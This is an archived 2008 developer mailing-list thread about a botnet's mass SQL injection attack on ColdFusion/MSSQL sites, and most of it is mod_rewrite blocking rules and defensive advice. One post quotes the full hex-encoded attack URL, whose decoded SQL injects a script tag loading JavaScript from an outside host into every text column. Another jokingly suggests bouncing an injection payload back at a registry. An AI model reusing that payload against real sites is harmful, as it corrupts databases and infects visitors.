.:.:.:.:.:.:.:.:.:.:.
Bobby Hartsfield
http://acoderslife.com
http://cf4em.com
I'd tell you to watch what you suggest on a public forum, but heck-- we
already know the FBI doesn't care. :)
~Brad
----- Excess quoted text cut - see Original Post for more -----
Author: Brad Wood
Short Link: http://www.houseoffusion.com/groups/cf-talk/thread.cfm/threadid:57241#310639
I'd tell you to watch what you suggest on a public forum, but heck-- we
already know the FBI doesn't care. :)
~Brad
----- Excess quoted text cut - see Original Post for more -----
Author: Bobby Hartsfield
Short Link: http://www.houseoffusion.com/groups/cf-talk/thread.cfm/threadid:57241#310632
Because the majority of the IPs I've seen from this one belong to them... as
they do more than not in these situations.
Start keeping firewall logs in general and checking them. I guarantee you
will find APNIC in them.
.:.:.:.:.:.:.:.:.:.:.
Bobby Hartsfield
http://acoderslife.com
http://cf4em.com
I guess i'm missing something, Bobby. Why does a big share of the
problem belong to Apnic?
Cheers
Mike Kear
Windsor, NSW, Australia
Adobe Certified Advanced ColdFusion Developer
AFP Webworks
http://afpwebworks.com
ColdFusion, PHP, ASP, ASP.NET hosting from AUD$15/month
----- Excess quoted text cut - see Original Post for more -----
from
> the cfhttp.filecontent
>
>
>
> Hmmm... if everyone did something like this... it would not only be
funny...
----- Excess quoted text cut - see Original Post for more -----
Author: Mike Kear
Short Link: http://www.houseoffusion.com/groups/cf-talk/thread.cfm/threadid:57241#310631
I guess i'm missing something, Bobby. Why does a big share of the
problem belong to Apnic?
Cheers
Mike Kear
Windsor, NSW, Australia
Adobe Certified Advanced ColdFusion Developer
AFP Webworks
http://afpwebworks.com
ColdFusion, PHP, ASP, ASP.NET hosting from AUD$15/month
----- Excess quoted text cut - see Original Post for more -----
Author: Bobby Hartsfield
Short Link: http://www.houseoffusion.com/groups/cf-talk/thread.cfm/threadid:57241#310629
I wrote something a long time ago to automate grabbing specified info from
http://ws.arin.net/whois/ on an IP... I was bored
You can pass the IP in the URL like so:
http://ws.arin.net/whois/?queryinput=203.160.1.52
So... parse the content of a cfhttp call to
http://ws.arin.net/whois/?queryinput=#ipAddress# to grab what
you want from
the cfhttp.filecontent
Hmmm... if everyone did something like this... it would not only be funny...
but probably piss off apnic and make them do something about their portion
of this problem (which is most of it)
<cfhttp url="http://ws.arin.net/whois/?queryinput=#cgi.remote_addr#"
resolveurl="no" />
<cfif findnocase('Asia Pacific', cfhttp.filecontent)>
<cflocation url="http://apnic.com/?;DECLARE @S CHAR(4000);SET
@S=CAST( etc... etc..." addtoken="no" />
</cfif>
Or if you are nicer than me...
<cfif findnocase('Asia Pacific', cfhttp.filecontent) AND
findnocase(';DECLARE', cgi.query_string)>
Yes... bored again.
.:.:.:.:.:.:.:.:.:.:.
Bobby Hartsfield
http://acoderslife.com
http://cf4em.com
Bobby, what have you been using to look up the origin of the IPs en masse?
I found a site that let's me do a handful at a time, but I don't know how
accurate the data it. It is saying the majority of my IPs originated from
the US.
~Brad
> Now look at how many of those are from Asia Pacific Network Info Centre
Author: Brad Wood
Short Link: http://www.houseoffusion.com/groups/cf-talk/thread.cfm/threadid:57241#310623
Bobby, what have you been using to look up the origin of the IPs en masse?
I found a site that let's me do a handful at a time, but I don't know how
accurate the data it. It is saying the majority of my IPs originated from
the US.
~Brad
> Now look at how many of those are from Asia Pacific Network Info Centre
Author: Bobby Hartsfield
Short Link: http://www.houseoffusion.com/groups/cf-talk/thread.cfm/threadid:57241#310621
Now look at how many of those are from Asia Pacific Network Info Centre
.:.:.:.:.:.:.:.:.:.:.
Bobby Hartsfield
http://acoderslife.com
http://cf4em.com
Here are my top 50: Note that the top 1 is in the same subnet as your
top 1. I had 134,993 attempts that I caught..
IP (times)
203.160.1.52 (705)
203.162.3.160 (373)
203.160.1.76 (325)
61.164.132.230 (325)
59.15.212.125 (258)
210.112.177.244 (252)
70.189.143.59 (219)
221.253.217.138 (204)
96.36.10.144 (196)
24.73.176.42 (194)
98.28.106.213 (190)
68.193.151.157 (165)
24.47.218.244 (162)
123.202.60.95 (143)
59.114.123.73 (141)
218.254.31.26 (140)
202.131.225.173 (138)
125.107.109.47 (135)
189.172.137.45 (133)
203.162.3.169 (133)
68.56.228.46 (133)
12.217.163.28 (132)
67.86.134.184 (132)
76.92.189.111 (132)
61.252.80.122 (131)
67.177.74.149 (130)
69.249.95.147 (130)
70.109.78.114 (129)
202.92.190.172 (125)
70.124.124.12 (124)
85.228.247.106 (122)
190.244.220.149 (121)
12.207.124.127 (118)
74.128.74.54 (118)
69.254.237.179 (117)
98.195.181.47 (117)
163.19.104.53 (114)
218.237.7.174 (114)
24.170.242.107 (114)
67.180.14.106 (113)
83.145.205.184 (112)
142.177.47.211 (110)
58.241.23.162 (110)
68.194.247.48 (110)
75.67.214.54 (110)
76.122.137.243 (110)
74.214.55.53 (108)
99.194.179.224 (108)
124.8.50.109 (107)
121.13.155.156 (105)
----- Excess quoted text cut - see Original Post for more -----
Author: Al Musella, DPM
Short Link: http://www.houseoffusion.com/groups/cf-talk/thread.cfm/threadid:57241#310620
Here are my top 50: Note that the top 1 is in the same subnet as your
top 1. I had 134,993 attempts that I caught..
IP (times)
203.160.1.52 (705)
203.162.3.160 (373)
203.160.1.76 (325)
61.164.132.230 (325)
59.15.212.125 (258)
210.112.177.244 (252)
70.189.143.59 (219)
221.253.217.138 (204)
96.36.10.144 (196)
24.73.176.42 (194)
98.28.106.213 (190)
68.193.151.157 (165)
24.47.218.244 (162)
123.202.60.95 (143)
59.114.123.73 (141)
218.254.31.26 (140)
202.131.225.173 (138)
125.107.109.47 (135)
189.172.137.45 (133)
203.162.3.169 (133)
68.56.228.46 (133)
12.217.163.28 (132)
67.86.134.184 (132)
76.92.189.111 (132)
61.252.80.122 (131)
67.177.74.149 (130)
69.249.95.147 (130)
70.109.78.114 (129)
202.92.190.172 (125)
70.124.124.12 (124)
85.228.247.106 (122)
190.244.220.149 (121)
12.207.124.127 (118)
74.128.74.54 (118)
69.254.237.179 (117)
98.195.181.47 (117)
163.19.104.53 (114)
218.237.7.174 (114)
24.170.242.107 (114)
67.180.14.106 (113)
83.145.205.184 (112)
142.177.47.211 (110)
58.241.23.162 (110)
68.194.247.48 (110)
75.67.214.54 (110)
76.122.137.243 (110)
74.214.55.53 (108)
99.194.179.224 (108)
124.8.50.109 (107)
121.13.155.156 (105)
----- Excess quoted text cut - see Original Post for more -----
Author: Jochem van Dieten
Short Link: http://www.houseoffusion.com/groups/cf-talk/thread.cfm/threadid:57241#310616
Terry Ford wrote:
> Nimda did not use SQL injection as any sort of primary vector.
But it infected websites in order to infect browsers in order to infect
websites etc. So the current wave of worms using the same mechanism is
really 7 years too late to be ingenious.
Jochem
Author: Terry Ford
Short Link: http://www.houseoffusion.com/groups/cf-talk/thread.cfm/threadid:57241#310615
Nimda did not use SQL injection as any sort of primary vector.
SQL injection attacks have been around forever, but botnet/worm SQL injection
attacks have really taken off pretty recently. It has gotten so bad that even
Microsoft recently released a security advisory article that doesn't deal with a
major flaw in its own software. That's rare ;)
http://www.microsoft.com/technet/security/advisory/954462.mspx
--- On Sat, 8/9/08, Jochem van Dieten <jochemd@oli.tudelft.nl> wrote:
----- Excess quoted text cut - see Original Post for more -----
Author: Mary Jo Sminkey
Short Link: http://www.houseoffusion.com/groups/cf-talk/thread.cfm/threadid:57241#310614
>1) It protects only against known threats. In order to be excluded we have
>to be a step far enough ahead to make sure the pattern is included.
>2) It will produce false positives.
>3) It is not role or user based.
>4) Tend to give a false sense of security.
Just to add to this, in my own testing of the RegEx, I definitely was getting
false positives, with just normal text strings (no other characters needed). So I
do have some concerns about any long-term use of it, and would caution anyone
using it to be aware that it may block more than you intend it to. In my own
software, I've modified how it is called so it's only used on the front-end,
open-to-the-world part of my software, as if someone gets through the back-end
security checks, they certainly don't need to bother with a SQL injection to mess
with the database! ;-) The goal here is just mainly to block the request as soon
as the invalid strings in any vulnerable scope are detected, and that's
essentially what it does, scanning the url, form, cookie and cgi scopes.
--- Mary
Jo
Author: Raymond Camden
Short Link: http://www.houseoffusion.com/groups/cf-talk/thread.cfm/threadid:57241#310612
Still no go for me. I appreciate the help from all.
----- Excess quoted text cut - see Original Post for more -----
Author: Wil Genovese
Short Link: http://www.houseoffusion.com/groups/cf-talk/thread.cfm/threadid:57241#310610
Ray,
Our sysadmin ran into the same issue when we started on this
yesterday Here is part of the rule we're using now and it works for
the case yours does not. note the ^.
RewriteCond %{QUERY_STRING} ^.*DECLARE.*$
Wil Genovese
One man with courage makes a majority.
-Andrew Jackson
A fine is a tax for doing wrong. A tax is a fine for doing well.
Author: Raymond Camden
Short Link: http://www.houseoffusion.com/groups/cf-talk/thread.cfm/threadid:57241#310608
Ok, I've noticed that when I go to
host.com/?declare
it is working
but
host.com/x/index.cfm?';DECLARE%20@S%20CHAR(4000);SET%20@S=CAST(0x4445434C415245204054207661726368617228323535292C40432076617263686172283430303029204445434C415245205461626C655F437572736F7220435552534F5220464F522073656C65637420612E6E616D652C622E6E616D652066726F6D207379736F626A6563747320612C737973636F6C756D6E73206220776865726520612E69643D622E696420616E6420612E78747970653D27752720616E642028622E78747970653D3939206F7220622E78747970653D3335206F7220622E78747970653D323331206F7220622E78747970653D31363729204F50454E205461626C655F437572736F72204645544348204E4558542046524F4D20205461626C655F437572736F7220494E544F2040542C4043205748494C4528404046455443485F5354415455533D302920424547494E20657865632827757064617465205B272B40542B275D20736574205B272B40432B275D3D5B272B40432B275D2B2727223E3C2F7469746C653E3C736372697074207372633D22687474703A2F2F73646F2E313030306D672E636E2F63737273732F772E6A73223E3C2F7363726970743E3C212D2D272720776865726520272B40432B27206E6F74206C696B6520272725223E3C2F7469746C653E3C736372697074207372633D22687474703A2F2F73646F2E313030306D672E636E2F63737273732F772E6A73223E3C2F7363726970743E3C212D2D272727294645544348204E4558542046524F4D20205461626C655F437572736F7220494E544F2040542C404320454E4420434C4F5345205461626C655F437572736F72204445414C4C4F43415445205461626C655F437572736F72%20AS%20CHAR(4000));EXEC(@S);
Is not working
----- Excess quoted text cut - see Original Post for more -----
Author: Raymond Camden
Short Link: http://www.houseoffusion.com/groups/cf-talk/thread.cfm/threadid:57241#310607
No go. It's not life or death - Im still using cfqueryparam, but I'd
love to get this working at the lowest level.
----- Excess quoted text cut - see Original Post for more -----
Author: Jon Clausen
Short Link: http://www.houseoffusion.com/groups/cf-talk/thread.cfm/threadid:57241#310606
Depending on your default directory settings in httpd.conf, you may
need to add the following directory attributes as well to your site to
allow mod_rewrite to operate:
#Allow mod rewrite on this directory
<Directory /srv/www/htdocs/mysite>
Options FollowSymLinks
AllowOverride All
Order deny,allow
Allow from all
</Directory>
Also, you can use pipe delimiters in the RewriteCond to add additional
SQL statements you might want to watch for (The syntax I'm seeing is
mostly MSSQL specific, but that could change):
#Add the following if the site isn't using mod_rewrite yet
RewriteEngine on
#SQL Injection Redirects
RewriteCond %{QUERY_STRING} .*DECLARE.*|.*NVARCHAR.*|.*EXEC\
(@.*|.*TRUNCATE TABLE.*|.*INSERT INTO.*
RewriteRule ^(.*)$ /violation.htm [NC,L]
HTH,
Jon
On Aug 9, 2008, at 7:32 AM, Matt Williams wrote:
----- Excess quoted text cut - see Original Post for more -----
Author: Matt Williams
Short Link: http://www.houseoffusion.com/groups/cf-talk/thread.cfm/threadid:57241#310605
----- Excess quoted text cut - see Original Post for more -----
Here's what I have within my <VirturalHost> block:
RewriteEngine On
RewriteOptions Inherit
RewriteCond %{QUERY_STRING} .*DECLARE.* [NC]
RewriteRule ^(.*)$ /violation.htm [nc,L]
Also, uncomment the
LoadModule rewrite_module modules/mod_rewrite.so
And make sure you restarted Apache for changes to take effect. With
that I can do this and get redirected:
http://myDomain/?foo=declare
http://myDomain/?declare
--
Matt Williams
"It's the question that drives us."
Author: Jochem van Dieten
Short Link: http://www.houseoffusion.com/groups/cf-talk/thread.cfm/threadid:57241#310604
Terry Ford wrote:
> Pretty ingenious really, infecting websites via injection attack in order to
infect clients with browser vulnerabilities.
In 2001 it was: http://www.cert.org/advisories/CA-2001-26.html
Now it is
just business as usual.
Jochem
Author: denstar
Short Link: http://www.houseoffusion.com/groups/cf-talk/thread.cfm/threadid:57241#310598
Theoretically, it would be possible to write a code-review type tool
that uses database introspection to rewrite queries to use the proper
cfqueryparms everywhere.
Wouldn't work for queries built by code tho, so... hmmm....
I wonder why we can't do something like that at a lower-level, ya
know? Right before CF runs the query, verify that all params are
bound to types? Use a bit of caching or something ta boot? Hmm...
I'm digging on hibernate... ORMs are probably the answer, neh?
Well, just random brainstorming...
--
Wholey moley! The opening of the Olympics was awersome!
Author: Terry Ford
Short Link: http://www.houseoffusion.com/groups/cf-talk/thread.cfm/threadid:57241#310597
Hi Ray,
I used this rewrite in the root directory's .htaccess file (linux/apache)... try
Windows equiv? I've run into the same problem that you describe using global
rewrites in years past, but this directory-based method seems to work reliably.
<Limit GET POST>
order allow,deny
allow from all
RewriteEngine On
.... rewrites here ....
Regards
--- On Sat, 8/9/08, Raymond Camden <rcamden@gmail.com> wrote:
----- Excess quoted text cut - see Original Post for more -----
Author: denstar
Short Link: http://www.houseoffusion.com/groups/cf-talk/thread.cfm/threadid:57241#310596
non-wrapped (and it was grabbed off the web somewhere):
Options +FollowSymLinks
Options +Indexes
RewriteEngine On
RewriteCond %{QUERY_STRING} .*DECLARE.* [NC]
RewriteRule .* /violation.htm [L]
RewriteCond %{PATH_INFO} .*DECLARE.* [NC]
RewriteRule .* /violation.htm [L]
The [L] tells it to stop there, BTW.
Author: denstar
Short Link: http://www.houseoffusion.com/groups/cf-talk/thread.cfm/threadid:57241#310595
Strange. And it looks like it /should/ work in the server conf too.
Might be something like symlinks being turned off in the main
Directory block or something.
Try adding this (we'll leave off the ifModule, as we'd want an error
if we don't have mod_rewrite loaded (and I'd try to limit where I'm
allowing following of symlinks, doing rewriting, etc.):
Options +FollowSymLinks Required: This is a security feature of the
rewrite engine and must be set. It informs Apache to follow the newly
created link names.
Options +Indexes Optional, set it if you want to display a
directory listing when no index page found (Uniform Server's default).
RewriteEngine On Required: Turns the rewrite engine on and must be set.
RewriteCond %{QUERY_STRING} .*DECLARE.* [NC]
RewriteRule .* /violation.htm [L]
RewriteCond %{PATH_INFO} .*DECLARE.* [NC]
RewriteRule .* /violation.htm [L]
And be sure that /violation.htm is a valid path to a file! That bit me
for a little bit (wrong named file, didn't seem to do anything).
:DeN
--
Employ your time in improving yourself by other men's writings, so
that you shall gain easily what others have labored hard for.
Socrates
----- Excess quoted text cut - see Original Post for more -----
Author: Mark Kruger
Short Link: http://www.houseoffusion.com/groups/cf-talk/thread.cfm/threadid:57241#310594
Pete,
Gabriel Reed and Mary Jo Sminkey created a decent regex and script that does
a good job.
http://www.coldfusionmuse.com/index.cfm/2008/7/28/Coldfusion-Blacklist-Funct
ion-for-SQLi
It uses a native java regex pattern matcher for effeciency - meaning it will
work only on cf 6.x or above.
Mary Jo wrapped it up in an include file here:
http://www.cfwebstore.com/index.cfm?fuseaction=page.download&downloadID=18
This file can be dropped into a cfapplication.cfm file (note: it must come
AFTER the <cfapplication> tag or you will need to edit it to not use the
application scope).
Also please note that using a black list function should be considered a
first line of defence and not a solution. It has several weaknesses
including:
1) It protects only against known threats. In order to be excluded we have
to be a step far enough ahead to make sure the pattern is included.
2) It will produce false positives.
3) It is not role or user based.
4) Tend to give a false sense of security.
Validation, DB permissions and congurations, and binding (cfqp) are all
important factors in protecting against injection.
I have to say that I'm watching this unfold and a lot of effort is going
into sticking our finger in the dike with blacklisting techniques instead of
laying out roadmaps for improving code. Yes I know - some code has thousands
of queries and it is boring (not to mention thankless) to laboriously insert
cfqueryparam into query after query. But that is a major part of the "fix" -
indeed a bigger part of the fix than any blacklisting technique we can
devise together.
Having said all of that, at this moment I completely understand the urgency
to stop the attack by the shortest means possible. In fact, the frequency of
these attacks is causing a denial of service effect for sites with a ton of
.cfm pages indexed - so stopping the attack before it get's to the meat of
your code is important. My blog, for example, got thousands of attacks
overnight. All of them "reached" the database and failed - but that doesn't
mean I'm just going to let them keep on hitting the DB. I put in my blocker
script to intercept the requests and abort them before they ever get to the
DB.
Recent efforts have gone further up the request chain and focused on ISAPI
rewrite and Mod_rewrite
(http://www.coldfusionmuse.com/index.cfm/2008/8/8/isapi-rewrite-rule-prevent
s-sql-injection) with the idea that these spurious requests should be
intercepted and handled prior to reaching the Coldfusion server altogether.
In this situation I am in favor of such efforts in spite of the general
catch-all nature - at least until the frequency of such attacks dies down.
-Mark
Mark A. Kruger, CFG, MCSE
(402) 408-3733 ext 105
www.cfwebtools.com
www.coldfusionmuse.com
www.necfug.com
Author: Raymond Camden
Short Link: http://www.houseoffusion.com/groups/cf-talk/thread.cfm/threadid:57241#310592
Hmm. I'm having no luck with this. I'm trying it on a blogcfc site, so
it's being added after /...., so I also added path_info
RewriteEngine on
RewriteCond %{QUERY_STRING} .*DECLARE.* [NC]
RewriteRule ^(.*)$ /violation.htm
RewriteCond %{PATH_INFO} .*DECLARE.* [NC]
RewriteRule ^(.*)$ /violation.htm
And it's not picking up when it sees declare in the url.
----- Excess quoted text cut - see Original Post for more -----
Author: denstar
Short Link: http://www.houseoffusion.com/groups/cf-talk/thread.cfm/threadid:57241#310591
You can keep it in a different .conf file, and use the Include
directive, to pull it in wherever you need it, BTW.
--
Employ your time in improving yourself by other men's writings, so
that you shall gain easily what others have labored hard for.
Socrates
> A simple look at the docs would state why, but it doesn't appear to
> work if you've got it "floating" (rewrites in general). I don't
> remember, off hand.
>
> I'm pretty sure it will work in a Directory or Location block too, tho.
Author: denstar
Short Link: http://www.houseoffusion.com/groups/cf-talk/thread.cfm/threadid:57241#310590
A simple look at the docs would state why, but it doesn't appear to
work if you've got it "floating" (rewrites in general). I don't
remember, off hand.
I'm pretty sure it will work in a Directory or Location block too, tho.
--
Employ your time in improving yourself by other men's writings, so
that you shall gain easily what others have labored hard for.
Socrates
> I've tried this on a windows apache server, but it doesn't seem to be
> working. Must it be in a VirtualDirectory block? I have it set outside
> so as to work on all sites.
Author: Raymond Camden
Short Link: http://www.houseoffusion.com/groups/cf-talk/thread.cfm/threadid:57241#310589
I've tried this on a windows apache server, but it doesn't seem to be
working. Must it be in a VirtualDirectory block? I have it set outside
so as to work on all sites.
----- Excess quoted text cut - see Original Post for more -----
Author: denstar
Short Link: http://www.houseoffusion.com/groups/cf-talk/thread.cfm/threadid:57241#310588
I think it goes:
RewriteCond %{QUERY_STRING} .*DECLARE.* [NC]
to have the no-case option.
Thanks for clarifying the loadmodule stuff, I should'a said something
along those lines earlier.
--
Employ your time in improving yourself by other men's writings, so
that you shall gain easily what others have labored hard for.
Socrates
----- Excess quoted text cut - see Original Post for more -----
Author: Pete Ruckelshaus
Short Link: http://www.houseoffusion.com/groups/cf-talk/thread.cfm/threadid:57241#310587
Has anyone written a broad-spectrum script (i.e. scrubs URL variables, form
variables, looks for verboten words, etc.) that is effective against these
attacks? If not, why don't we get coordinated and write something as a
community that users can simple include/invoke via application.cfm or in
specific files...something that is not limited to a framework and something
that would perhaps work with CF6/7/8. I know there are people on this list
who are MUCH more experienced than I am that would have a much more elegant
solution than I could come up with. Moreover, because virtually all of my
sites are on shared hosts (Windows/IIS/CF8), I don't have the luxury of
being able to do URL rewrites and that sort of thing.
Thanks,
Pete
Author: Matt Williams
Short Link: http://www.houseoffusion.com/groups/cf-talk/thread.cfm/threadid:57241#310582
Scratch that. declare is case sensitive. Seems to work now.
Matt
----- Excess quoted text cut - see Original Post for more -----
Author: Brad Wood
Short Link: http://www.houseoffusion.com/groups/cf-talk/thread.cfm/threadid:57241#310581
> The problem becomes even more difficult to enforce
> since ISPs don't necessarily want to offend their paying customers.
It depends on the ISP. I've seen plenty that didn't mind telling a customer
they needed to clean their server or be shut down.
The real impossibility I've found is actually getting information about the
user of an IP address. (This is probably a good thing). ISP's generally
won't cough anything up without a court order and you usually can't get one
of those unless you have a certain dollar figure worth of damages. I have
had ISP's contact their customer's on my behalf to question them about
suspicious activity though.
~Brad
Author: Matt Williams
Short Link: http://www.houseoffusion.com/groups/cf-talk/thread.cfm/threadid:57241#310580
> Here's the rewrite I'm using (linux apache) to keep traffic off the app
server.
>
> RewriteCond %{QUERY_STRING} .*DECLARE.*
> RewriteRule ^(.*)$ violation.htm [nc,L]
Okay, I'm a rewrite and apache newbie. I'm trying to replicate locally
before doing this on my server. I'm running Win XP with Apache 2.2.
In my httpd.conf file I removed the # sign from this line:
LoadModule rewrite_module modules/mod_rewrite.so
Then I added the above rewrite rules within one of my <VirtualHost> sites.
Should that be all I have to do? Doesn't seem to work if I do
myLocalSite/index.cfm?test=DECLARE
Do the rewrite rules go somewhere else? Do I need something more than
just he LoadModule line?
Thanks,
--
Matt Williams
"It's the question that drives
us."
Author: Brad Wood
Short Link: http://www.houseoffusion.com/groups/cf-talk/thread.cfm/threadid:57241#310579
> on. So go ahead and just block THE WORLD.
>
I don't plan on blocking anyone. I just wanted to play with the data. :)
~Brad
Author: Gerald Guido
Short Link: http://www.houseoffusion.com/groups/cf-talk/thread.cfm/threadid:57241#310578
>>.... If you use CF to write the bot, for instance ;-)
Speaking of such, snagging a cookie with CF is ridiculously easy (of course
it is ;) ). cfhttp returns the responseHeader a structure.
EX:
This:
<cfoutput>
#cfhttp.responseHeader["Set-Cookie"]#
</cfoutput>
Returns this:
mytestcookie=test;expires=Sun, 01-Aug-2038 21:57:28 GMT;path=/
On Fri, Aug 8, 2008 at 12:47 PM, Claude Schneegans <
schneegans@internetique.com> wrote:
----- Excess quoted text cut - see Original Post for more -----
Author: Matt Robertson
Short Link: http://www.houseoffusion.com/groups/cf-talk/thread.cfm/threadid:57241#310577
Well I guess I'm glad I am not the only one dealing with this. I implemented
<cfif cgi.query_string contains "DECLARE%20">
<cfheader statuscode="500" statustext="Server Error">
</cfif>
at the top of /Application.cfm and that stopped it dead in its tracks,
but not before spiking my custom logging app and turning my weekly
sales response figures to oatmeal. A little spit and polish fixed
that.
One client had about a 3-day love affair with these bots before they
went away. They made a mess of his error logs when the non-conforming
data hit cfqueryparam but otherwise no noticeable effect.
I think if I was still actively in the contract programming scene I
would find the person propagating this and... pin a medal on them and
shake their hand. This one attack has caused a whole slew of folks
who thought I was a PITA crank over-obsessed with security to call me
up, apologize and thank me. If I was still taking clients I'd have
just doubled up my dance card.
--
--m@Robertson--
Janitor, The Robertson Team
mysecretbase.com
Author: Eric P
Short Link: http://www.houseoffusion.com/groups/cf-talk/thread.cfm/threadid:57241#310576
----- Excess quoted text cut - see Original Post for more -----
We don't. It was definitely an automated attack (I.e., bot), but it
"felt" like it was controlled by one source/individual as opposed to
several sources doing the same attack method because as we blocked
each IP address the attack took ~20-30 minutes to begin again (I.e.,
switch IP address). And each chunk of attacks were all coming from a
solitary IP address (which is why we began blocking them).
Errata: Below I meant "IPs" to be "ISPs".
"So how is anyone going to be able to effectively communicate with
these IPs to tell them about the compromised systems on their network?
The problem becomes even more difficult to enforce since IPs don't
necessarily want to offend their paying customers."
Eric Pierce
Author: Claude Schneegans
Short Link: http://www.houseoffusion.com/groups/cf-talk/thread.cfm/threadid:57241#310575
>>Then 20-30 minutes later he would show up again with a different IP.
How do you know it was the same guy ?
May be it was the same bot doing the same thing, but these bots are just
like viruses,
they spread anywhere.
--
_______________________________________
REUSE CODE! Use custom tags;
See http://www.contentbox.com/claude/customtags/tagstore.cfm
(Please send any spam to this address: piegeacon@internetique.com)
Thanks.
Author: Wil Genovese
Short Link: http://www.houseoffusion.com/groups/cf-talk/thread.cfm/threadid:57241#310573
So far I have done a small non-representative sample of IP's and found
them to be from all around the globe. I have Asia Pacific Network,
RIPE Network Amsterdam, Latin America and Caribbean (LANTIC), Hughs
Network MD USA, Rogers Cable Toronto ON, and the list goes on and
on. So go ahead and just block THE WORLD.
Wil Genovese
One man with courage makes a majority.
-Andrew Jackson
A fine is a tax for doing wrong. A tax is a fine for doing well.
On Aug 8, 2008, at 3:25 PM, Brad Wood wrote:
----- Excess quoted text cut - see Original Post for more -----
Author: Terry Ford
Short Link: http://www.houseoffusion.com/groups/cf-talk/thread.cfm/threadid:57241#310572
<< Also, I'd like to explore the possibility of reporting compromised
people to their ISPs. >>
Well good luck ;)
As I posted earlier, we have been hit by over 200,000 attack attempts over the
past 2 days.
Here's the analysis from our last 195,264 attack attempts:
Our attacks over the past *24 hours* have originated from *12,007* different IP
addresses. Twelve THOUSAND. That is not a typo. This is an extremely large
botnet, pure and simple. These IP addresses appaer to be largely random folks
who are using browsers with vulnerabilities.
Each client, on average, makes 2-4 attack requests.
Here are the origin IPs with the most attacks:
| ip | attacks | tmp1 | tmp2 |
+-----------------+-------+----------+----------+
| 203.160.1.40 | 1246 | NULL | NULL |
| 203.160.1.70 | 596 | NULL | NULL |
| 61.164.132.230 | 478 | NULL | NULL |
| 211.72.233.9 | 471 | NULL | NULL |
| 203.162.3.159 | 462 | NULL | NULL |
| 211.72.233.8 | 452 | NULL | NULL |
| 211.72.233.10 | 429 | NULL | NULL |
| 221.253.217.138 | 319 | NULL | NULL |
| 210.112.177.244 | 252 | NULL | NULL |
| 59.15.212.125 | 252 | NULL | NULL |
| 70.88.218.70 | 240 | NULL | NULL |
| 67.86.134.184 | 234 | NULL | NULL |
| 125.107.109.47 | 231 | NULL | NULL |
| 202.92.190.172 | 225 | NULL | NULL |
| 59.114.123.73 | 224 | NULL | NULL |
| 12.215.231.131 | 218 | NULL | NULL |
| 68.193.151.157 | 200 | NULL | NULL |
| 98.28.106.213 | 200 | NULL | NULL |
| 122.118.202.29 | 198 | NULL | NULL |
| 67.184.18.83 | 196 | NULL | NULL |
There have been fewer than 5 attacks from each of 4515 different IPs.
So for those of you trying to stop this sort of thing by blocking IP addresses,
don't bother.
Some of those 203.* and 211.* addresses look suspicious, and perhaps are part of
the botnet control, but who knows...
I have the complete list of 12,000 IP addresses (and counting at the rate of 500+
new IP addresses each hour) of this botnet available if that's of any use to
anyone.
Regards
--- On Fri, 8/8/08, Brad Wood <brad@bradwood.com> wrote:
----- Excess quoted text cut - see Original Post for more -----
Author: Eric P
Short Link: http://www.houseoffusion.com/groups/cf-talk/thread.cfm/threadid:57241#310571
----- Excess quoted text cut - see Original Post for more -----
Once we followed around the IP addresses of what appeared to be a lone
form stuffer. We began to ban any requests from his IP. Then 20-30
minutes later he would show up again with a different IP.
Investigating his IP addresses showed him "coming" from Chili,
Denmark, etc. So how is anyone going to be able to effectively
communicate with these IPs to tell them about the compromised systems
on their network? The problem becomes even more difficult to enforce
since IPs don't necessarily want to offend their paying customers.
Eric Pierce
Author: Brad Wood
Short Link: http://www.houseoffusion.com/groups/cf-talk/thread.cfm/threadid:57241#310569
Yeah, I'm well aware of the near impossibility of ever tracking IP address
to anything useful, but I'm a person who likes data, for within mounds of
useless data can be found trends. Most of all, I'm just curious. Also, I'd
like to explore the possibility of reporting compromised people to their
ISPs. Some US ISPs do have abuse policies that might cause them to pressure
their users to clean themselves. A number of these attacks could have come
from servers for all we know. Servers are desirable for Trojans due to
their fast internet connections and 24/7 uptime.
~Brad
> blocking the IPs would probably stop the attacks, but analyzing them is
> going to be useless. They're either using some hacked computer as a proxy,
> or have some sort of spoofing in place. Unless you're really good at
> forensics, you'll never find their real origination point.
Author: Andy Matthews
Short Link: http://www.houseoffusion.com/groups/cf-talk/thread.cfm/threadid:57241#310568
blocking the IPs would probably stop the attacks, but analyzing them is
going to be useless. They're either using some hacked computer as a proxy,
or have some sort of spoofing in place. Unless you're really good at
forensics, you'll never find their real origination point.
andy
Tell us how you really feel Ben. :)
I had to temporarily stop apache on my site long enough to get a stop gap in
place. My database is safe, but I was getting around 90 requests a second
and ColdFusion and MySQL were eating up all the server's CPU trying to keep
up. SSH was even unresponsive.
I think I'm going to dump all these attempts in a database to analyze. I
curious where the majority of the IPs are coming from. There has to be a
way to squeak in the ear of ISPs loud enough to have them shut down infected
users until they are cleaned.
~Brad
----- Excess quoted text cut - see Original Post for more -----
Author: Andy Matthews
Short Link: http://www.houseoffusion.com/groups/cf-talk/thread.cfm/threadid:57241#310566
blocking the IPs would probably stop the attacks, but analyzing them is
going to be useless. They're either using some hacked computer as a proxy,
or have some sort of spoofing in place. Unless you're really good at
forensics, you'll never find their real origination point.
andy
Tell us how you really feel Ben. :)
I had to temporarily stop apache on my site long enough to get a stop gap in
place. My database is safe, but I was getting around 90 requests a second
and ColdFusion and MySQL were eating up all the server's CPU trying to keep
up. SSH was even unresponsive.
I think I'm going to dump all these attempts in a database to analyze. I
curious where the majority of the IPs are coming from. There has to be a
way to squeak in the ear of ISPs loud enough to have them shut down infected
users until they are cleaned.
~Brad
----- Excess quoted text cut - see Original Post for more -----
Author: Michael Dinowitz
Short Link: http://www.houseoffusion.com/groups/cf-talk/thread.cfm/threadid:57241#310565
I'm using ionic isapi with the following
RewriteCond %{QUERY_STRING} ;DECLARE [I]
RewriteRule ;DECLARE /index.htm [I,L]
it works perfectly except for a single issue. If you're using a custom 404
in iis (like piping 404 errors to CF), then the isapi will hang the server.
--
Michael Dinowitz (http://www.linkedin.com/in/mdinowitz)
President: House of Fusion (http://www.houseoffusion.com)
Publisher: Fusion Authority (http://www.fusionauthority.com)
Adobe Community Expert / Advanced Certified ColdFusion Professional
Author: Terry Ford
Short Link: http://www.houseoffusion.com/groups/cf-talk/thread.cfm/threadid:57241#310562
Our site has now seen just over 200,000 attack attempts over the past 48 hours,
73,000 attack attempts over the past 5 hours.
Not nearly a DOS concern yet, as the acceleration of attacks has started to at
least flatten a bit over the last 2-3 hours, but we're watching it carefully.
The attacks appear to only effect MSSQL. MySql seems to be safe from THIS
attack, but clearly it's time to batten the hatches if you haven't already.
We have 1.2 million pages indexed in Google, where the botnet is extracting URLs
from. The level of the attack you are witnessing is likely proportional to your
presence in google.
